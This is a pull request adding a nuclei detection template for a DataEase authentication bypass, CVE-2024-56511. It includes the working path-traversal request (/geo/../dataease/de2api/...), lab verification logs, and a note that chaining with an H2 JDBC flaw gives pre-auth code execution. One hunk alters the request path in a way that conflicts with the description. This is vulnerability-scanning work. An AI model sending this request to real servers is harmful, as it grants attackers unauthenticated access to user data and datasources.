### PR TITLE
Add CVE-2024-56511 - DataEase whitelist path-traversal authentication bypass

### DIFF
--- a/http/cves/2024/CVE-2024-56511.yaml
+++ b/http/cves/2024/CVE-2024-56511.yaml
@@ -27,12 +27,12 @@ info:
     product: dataease
     shodan-query: http.title:"DataEase"
     fofa-query: title="DataEase"
-  tags: cve,cve2024,dataease,authbypass,traversal
+  tags: cve,cve2024,dataease,auth-bypass,traversal
 
 http:
   - raw:
       - |+
-        GET /geo/../dataease/de2api/datasource/types HTTP/1.1
+        GET /geo/../de2api/datasource/types HTTP/1.1
         Host: {{Hostname}}
 
     unsafe: true
@@ -42,8 +42,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(content_type, "application/json")'
-          - 'contains(body, "\"code\":0")'
-          - 'contains(body, "mysql")'
-          - 'contains(body, "sqlServer")'
-          - 'contains(body, "oracle")'
+          - 'contains_all(body, "\"code\":0", "mysql", "sqlServer", "oracle")'
         condition: and

--- a/http/cves/2024/CVE-2024-56511.yaml
+++ b/http/cves/2024/CVE-2024-56511.yaml
@@ -7,7 +7,7 @@ info:
   description: |
     DataEase versions up to and including 2.10.3 contain an authentication bypass in `io.dataease.auth.filter.TokenFilter`. The filter passes the raw, unnormalized request URI to `WhitelistUtils.match()`, which only checks for whitelisted prefixes such as `/geo/`, `/customGeo/`, `/map/`, `/oauth2/`, and `/websocket` without resolving `..` segments. By prepending a whitelisted prefix and traversing back into the configured `server.servlet.context-path`, an attacker bypasses the filter while Tomcat still routes the request to the genuine, protected controller. This collapses the entire `/de2api` surface (user management, datasources, dashboards, exports) into unauthenticated access.
   impact: |
-    An unauthenticated attacker can reach every `/de2api` endpoint as if authenticated, exposing user management, datasource configuration, dashboards, and exports. Chained with CVE-2025-32966 (H2 JDBC RCE) the bypass becomes pre-auth remote code execution.
+    An unauthenticated attacker can reach every `/de2api` endpoint as if authenticated, exposing user management, datasource configuration, dashboards, and exports. Chained with CVE-2025-32966  (H2 JDBC RCE) the bypass becomes pre-auth remote code execution.
   remediation: |
     Upgrade to DataEase 2.10.4 or later, which normalizes the request path before whitelist matching.
   reference:

--- a/http/cves/2024/CVE-2024-56511.yaml
+++ b/http/cves/2024/CVE-2024-56511.yaml
@@ -1,0 +1,49 @@
+id: CVE-2024-56511
+
+info:
+  name: DataEase < 2.10.4 - Authentication Bypass via Whitelist Path Traversal
+  author: ChrisJr404
+  severity: critical
+  description: |
+    DataEase versions up to and including 2.10.3 contain an authentication bypass in `io.dataease.auth.filter.TokenFilter`. The filter passes the raw, unnormalized request URI to `WhitelistUtils.match()`, which only checks for whitelisted prefixes such as `/geo/`, `/customGeo/`, `/map/`, `/oauth2/`, and `/websocket` without resolving `..` segments. By prepending a whitelisted prefix and traversing back into the configured `server.servlet.context-path`, an attacker bypasses the filter while Tomcat still routes the request to the genuine, protected controller. This collapses the entire `/de2api` surface (user management, datasources, dashboards, exports) into unauthenticated access.
+  impact: |
+    An unauthenticated attacker can reach every `/de2api` endpoint as if authenticated, exposing user management, datasource configuration, dashboards, and exports. Chained with CVE-2025-32966 (H2 JDBC RCE) the bypass becomes pre-auth remote code execution.
+  remediation: |
+    Upgrade to DataEase 2.10.4 or later, which normalizes the request path before whitelist matching.
+  reference:
+    - https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-56511
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-56511
+    cwe-id: CWE-289
+    epss-score: 0.00271
+    epss-percentile: 0.50488
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dataease
+    product: dataease
+    shodan-query: http.title:"DataEase"
+    fofa-query: title="DataEase"
+  tags: cve,cve2024,dataease,authbypass,traversal
+
+http:
+  - raw:
+      - |+
+        GET /geo/../dataease/de2api/datasource/types HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "\"code\":0")'
+          - 'contains(body, "mysql")'
+          - 'contains(body, "sqlServer")'
+          - 'contains(body, "oracle")'
+        condition: and


### PR DESCRIPTION
### Summary
Adds a verified template for **CVE-2024-56511** — DataEase versions up to and including 2.10.3 contain a critical authentication bypass in `io.dataease.auth.filter.TokenFilter`. The filter passes the raw, unnormalized URI to `WhitelistUtils.match()`, which only checks for whitelisted prefixes (`/geo/`, `/customGeo/`, `/map/`, `/oauth2/`, `/websocket`) without resolving `..` segments. By prepending a whitelisted prefix and traversing back into the configured `server.servlet.context-path`, the filter chain short-circuits while Tomcat normalizes the path and routes the request to the genuine, protected controller.

This collapses the entire `/de2api` surface (user management, datasources, dashboards, exports) into unauthenticated access. Chained with CVE-2025-32966 (H2 JDBC RCE), it becomes pre-auth remote code execution.

References:
- https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x
- https://nvd.nist.gov/vuln/detail/CVE-2024-56511

### Detection logic
Single raw HTTP request that the filter reads as `/geo/...` (whitelisted) but Tomcat normalizes to `/dataease/de2api/datasource/types` (a protected admin endpoint that returns a fixed list of supported datasource drivers).

`unsafe: true` is required so the literal `/geo/../...` bytes hit the wire — `--path-as-is`-equivalent. On a vulnerable instance the response is HTTP 200 with a JSON body containing `\"code\":0` and the driver list (`mysql`, `sqlServer`, `oracle`, ...). On a patched instance (2.10.4+) the path is normalized before whitelist matching, so the request is rejected with 401 / `code:60004` / `\"接口地址无效\"`.

### Verification
Tested on a clean Kali host using the published vulhub images.

**Vulnerable target — match (template behaves as expected):**

`vulhub/dataease:2.10.3` — `docker compose up -d` from `vulhub/dataease/CVE-2024-56511/`:
```
[CVE-2024-56511] Dumped HTTP request for http://127.0.0.1:8100/geo/../dataease/de2api/datasource/types
GET /geo/../dataease/de2api/datasource/types HTTP/1.1
Host: 127.0.0.1:8100

[CVE-2024-56511] Dumped HTTP response
HTTP/1.1 200
Content-Type: application/json
{\"code\":0,\"msg\":null,\"data\":[\"folder\",\"API\",\"Excel\",\"mysql\",\"impala\",\"mariadb\",\"StarRocks\",\"es\",\"doris\",\"TiDB\",\"oracle\",\"pg\",\"redshift\",\"db2\",\"ck\",\"h2\",\"sqlServer\",\"mongo\"]}
[CVE-2024-56511:dsl-1] [http] [critical] http://127.0.0.1:8100/geo/../dataease/de2api/datasource/types
[INF] Scan completed in 4.349083ms. 1 matches found.
```

**Patched target — no match (no false positive):**

`vulhub/dataease:2.10.7` — same exploit path:
```
HTTP/1.1 401
Content-Length: 96
{\"code\":60004,\"msg\":\"接口地址无效 [/geo/../dataease/de2api/datasource/types]\",\"data\":null}
[INF] Scan completed in 11.733722ms. No results found.
```

### Reproduction
```bash
git clone https://github.com/vulhub/vulhub.git
cd vulhub/dataease/CVE-2024-56511
docker compose up -d
# wait ~40s for Spring + MySQL to come up
nuclei -t http/cves/2024/CVE-2024-56511.yaml -u http://localhost:8100   # match
# now switch to the patched 2.10.7 image
docker compose down
cd ../CVE-2025-32966
docker compose up -d
nuclei -t http/cves/2024/CVE-2024-56511.yaml -u http://localhost:8100   # no match
```

### Notes
- The bypass requires DataEase to run with a non-default `server.servlet.context-path` (the vulhub setup, and the typical production setup behind a path-routing reverse proxy, both use `/dataease`). Default-context-path deployments do not normalize through the same dispatch path and are out of scope for this template.
- `unsafe: true` is required because nuclei's normal HTTP client (and most tooling) will collapse `/geo/../...` client-side before transmission, which kills the exploit.
- `|+` block scalar with the trailing blank line ensures the request terminates with `\r\n\r\n` so the upstream nginx accepts it.

### Template Type / Checklist
- [x] CVE template (http/cves/2024/)
- [x] Verified (`metadata.verified: true`)
- [x] Multiple matchers to reduce false positives (status + content-type + four content markers)
- [x] Validated with `nuclei -validate`
- [x] No real-world targets referenced